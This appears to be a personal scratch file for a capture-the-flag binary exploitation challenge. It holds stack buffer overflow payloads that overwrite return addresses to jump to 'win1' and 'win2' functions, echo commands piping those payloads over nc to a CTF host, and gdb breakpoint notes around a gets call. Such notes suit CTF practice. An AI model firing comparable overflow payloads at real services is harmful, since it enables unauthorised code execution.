// old 00000000004009a6 - win1
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBB¦	@\0\0

0000000000400b18 - win1
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBB\024\011@\0\0

//0000000000400b88 - win2
//AAAAAAAAAAAAAAAAAAAAAAAAÿÿÿÿÿÿÿÿìÈìÈìÈìÈ\011@\0\0
0000000000400bc5 - win2
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBÅ\011@\0\0

//0000000000400b2a - main
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBB*\011@\0\0

echo -e 'AAAAAAAAAAAAAAAAAAAAAAAA\xff\xff\xff\xff\xff\xff\xff\xff\xec\xc8\xec\xc8\xec\xc8\xec\xc8\x88\x0b@\x00\x00' | nc nc.ctf.unitedctf.ca 4000

echo -e 'AAAAAAAAAAAAAAAAAAAAAAAA\xff\xff\xff\xff\xff\xff\xff\xff\xec\xc8\xec\xc8\xec\xc8\xec\xc8\x88\x0b@\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xec\xc8\xec\xc8\xec\xc8\xec\xc8' | nc nc.ctf.unitedctf.ca 4000

0x1337133713371337
0xECC8ECC8ECC8ECC8	// flipped

FF - ÿ
EC - ì
C8 - È


gdb:
breakpoints:
	break main
	break win1
	break win2
	break *0x00000000004009c7	// gets
	break *0x00000000004009cc	// right after gets

show stack:		x/100x $sp
show registers:	info registers


ctrl+space inserts a NULL \0
